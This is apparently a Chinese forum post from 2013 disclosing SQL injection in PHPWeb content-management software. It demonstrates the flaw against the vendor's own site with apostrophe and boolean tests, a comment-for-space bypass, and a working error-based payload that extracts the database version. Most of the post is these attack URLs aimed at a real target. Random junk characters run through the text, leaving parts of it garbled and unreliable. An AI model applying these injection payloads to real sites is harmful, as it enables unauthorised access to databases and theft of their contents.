phpweb所有的整站程序伪静态页面都存在sql注入
& z1 Y$ e4 z) \" |; T2 x# F9 T* ?0 ^. a1 B L
主站:http://phpweb.net/
- k" t7 w) M& r4 W: |加’检测:
4 k6 h5 c+ q# G) u. P
. ~; t* E$ ^, Z; y yhttp://www.phpweb.net/down/html/?772′.html
' [: Q1 B8 H- v$ B3 O0 W& h
/ A( j4 s0 Z) h出错8 [2 Y9 p6 ]) m% ~
存在注入。
9 ?) ~- O. S8 v1 \9 \! R不能用空格,只能用/*罗
" h! \; ]1 B, bhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常) @+ B6 t! y/ A( ~
9 P9 g& T, ^9 m d9 M/ i
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.; r0 c/ ?7 B2 o: |; x( R8 }
爆数据库版本: j8 F/ N3 i; ?; }/ d. }
! Q; C0 o1 w( R6 ^
?# ? V6 t- m) S6 a h& J
1
+ O6 \8 }! R) Dhttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
1 S- I6 X9 A- l% @0 m3 p+ G更新日期: 2013-01-03 13:39:50
9 x2 z [( J4 S |
发表于 2013-1-4 19:46:42
收藏
支持
反对